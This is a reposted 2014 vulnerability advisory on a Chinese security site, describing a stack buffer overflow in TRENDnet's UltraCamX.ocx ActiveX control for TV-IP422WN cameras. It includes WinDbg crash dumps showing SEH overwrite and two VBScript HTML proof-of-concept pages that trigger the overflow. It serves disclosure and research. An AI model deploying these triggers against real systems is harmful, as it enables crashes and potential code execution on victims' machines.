首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF
来源:http://www.zeroscience.mk 作者:LiquidWorm 发布时间:2014-11-26  
 
TRENDnet SecurView Wireless Network Camera TV-IP422WN (UltraCamX.ocx) Stack BoF
  
  
Vendor: TRENDnet
Product web page: http://www.trendnet.com
Affected version: TV-IP422WN/TV-IP422W
  
Summary: SecurView Wireless N Day/Night Pan/Tilt Internet Camera, a powerful
dual-codec wireless network camera with the 2-way audio function that provides
the high-quality image and on-the-spot audio via the Internet connection.
  
Desc: The UltraCam ActiveX Control 'UltraCamX.ocx' suffers from a stack buffer
overflow vulnerability when parsing large amount of bytes to several functions
in UltraCamLib, resulting in memory corruption overwriting severeal registers
including the SEH. An attacker can gain access to the system of the affected
node and execute arbitrary code.
  
-----------------------------------------------------------------------------
  
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
  
-----------------------------------------------------------------------------
  
  
Tested on: Microsoft Windows 7 Professional SP1 (EN)
  
  
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
  
  
Advisory ID: ZSL-2014-5211
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5211.php
  
  
16.11.2014
  
---
  
  
Properties:
-----------
  
FileDescription     UltraCam ActiveX Control
FileVersion     1, 1, 52, 16
InternalName        UltraCamX
OriginalFileName    UltraCamX.ocx
ProductName     UltraCam device ActiveX Control
ProductVersion      1, 1, 52, 16
  
  
List of members:
----------------
  
Interface IUltraCamX : IDispatch
Default Interface: True
Members : 62
    RemoteHost
    RemotePort
    AccountCode
    GetConfigValue
    SetConfigValue
    SetCGIAPNAME
    Password
    UserName
    fChgImageSize
    ImgWidth
    ImgHeight
    SnapFileName
    AVIRecStart
    SetImgScale
    OpenFolder
    OpenFileDlg
    TriggerStatus
    AVIRecStatus
    Event_Frame
    PlayVideo
    SetAutoScale
    Event_Signal
    WavPlay
    CGI_ParamGet
    CGI_ParamSet
    MulticastEnable
    MulticastStatus
    SetPTUserAllow
  
  
Vulnerable members of the class:
--------------------------------
  
CGI_ParamSet
OpenFileDlg
SnapFileName
Password
SetCGIAPNAME
AccountCode
RemoteHost
  
  
PoC(s):
-------
  
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Property Let SnapFileName As String"
memberName = "SnapFileName"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1
  
thricer=String(8212, "A")
  
target.SnapFileName = thricer
  
</script>
</html>
  
--
  
eax=41414141 ebx=00809590 ecx=41414141 edx=031e520f esi=0080c4d4 edi=00000009
eip=1002228c esp=003befb4 ebp=003befbc iopl=0         nv up ei pl nz na pe nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210206
UltraCamX!DllUnregisterServer+0x109bc:
1002228c 0fb64861        movzx   ecx,byte ptr [eax+61h]     ds:002b:414141a2=??
  
--
  
  
<html>
<object classid='clsid:E1B26101-23FB-4855-9171-F79F29CC7728' id='target' />
<script language='vbscript'>
targetFile = "C:\Windows\Downloaded Program Files\UltraCamX.ocx"
prototype  = "Function OpenFileDlg ( ByVal sFilter As String ) As String"
memberName = "OpenFileDlg"
progid     = "UltraCamLib.UltraCamX"
argCount   = 1
  
thricer=String(2068, "A")
  
target.OpenFileDlg thricer
  
</script>
</html>
  
--
  
0:000> r
eax=41414141 ebx=100ceff4 ecx=0042df38 edx=00487900 esi=00487a1c edi=0042e9fc
eip=100203fb esp=0042d720 ebp=0042e9a8 iopl=0         nv up ei pl nz ac po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00210212
UltraCamX!DllUnregisterServer+0xeb2b:
100203fb 8b48e0          mov     ecx,dword ptr [eax-20h] ds:002b:41414121=????????
0:000> !exchain
0042eda8: 41414141
Invalid exception stack at 41414141
  
--

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·WordPress WP-DB-Backup 2.2.4 B
·phpMyRecipes 1.2.2 (dosearch.p
·FluxBB 1.5.6 SQL Injection
·Arris VAP2500 Authentication B
·Atrax Botnet Shell Upload Vuln
·Linux Kernel libfutex Local Ro
·Wordpress wpDataTables 1.5.3 s
·All-in-One WP Migration 2.0.2
·Internet Explorer OLE Pre-IE11
·Mozilla Firefox 3.6 mChannel U
·Hikvision DVR RTSP Request Rem
·PHP 5.x / Bash Shellshock Proo
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved